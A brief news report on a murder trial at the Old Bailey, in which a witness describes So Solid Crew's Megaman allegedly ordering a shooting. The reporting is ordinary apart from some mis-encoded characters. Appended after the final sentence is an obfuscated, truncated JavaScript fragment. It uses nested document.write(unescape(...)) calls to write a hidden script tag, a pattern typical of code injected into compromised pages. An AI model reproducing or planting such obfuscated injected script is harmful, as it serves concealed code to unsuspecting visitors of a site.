So Solid Crew leader Megaman instructed a friend to shoot a love rival, the Old Bailey in London heard yesterday (September 20).
A witness told the police that the rapper â€" real name Dwayne Vincent â€" instructed Carl Morgan "to burst", slang for shooting, Colin Scarlett.
Morgan had had a seven-year relationship and two children with Scarlett's girlfriend, the court was told.
The witness, who was only identified as A, spoke from behind screens using a voice-distorting machine in court.
Witness A had told police that Megaman had mentioned disrespect, but when this claim was repeated in court said he could not remember the So Solid Crew man saying that, BBC News reports.
According the statement A gave police there were "two quick flashes" and Morgan and Scarlett "were both firing - I do not know how many times. There were loads of bangs and flashes". Morgan and Megaman then ran off in the same direction, according to A.
Scarlett, who was attacked outside his home in Tooting south London on November 6, then dropped into the road and said he'd been shot, according to the statement given to police.
Both Megaman and Morgan deny murdering Scarlett. The case continues.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
